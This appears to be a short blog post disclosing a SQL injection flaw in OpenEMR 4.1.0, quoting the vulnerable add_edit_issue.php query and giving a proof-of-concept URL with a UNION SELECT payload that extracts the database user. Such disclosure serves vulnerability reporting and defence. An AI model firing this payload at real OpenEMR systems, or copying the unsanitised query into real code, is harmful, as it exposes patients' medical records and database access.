Openemr-4.1.0 SQL injection Vulnerability

# Tested on: [Windows 7]
---------------------------------------
source of : /interface/patient_file/summary/add_edit_issue.php:
$irow = array();
if ($issue)
$irow = sqlQuery("SELECT * FROM lists WHERE id = $issue");; <--------------------- SQL injection
else if ($thistype)
$irow['type'] = $thistype
proof of concept:
http://[attack url]/interface/patient_file/summary/add_edit_issue.php?issue=0+union
+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,user(),25,26,27--

本文固定链接: https://www.unhonker.com/technical/352.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年10月20日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Openemr-4.1.0 SQL injection Vulnerability | 90' s Blog|关注网络信息安全

Openemr-4.1.0 SQL injection Vulnerability:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!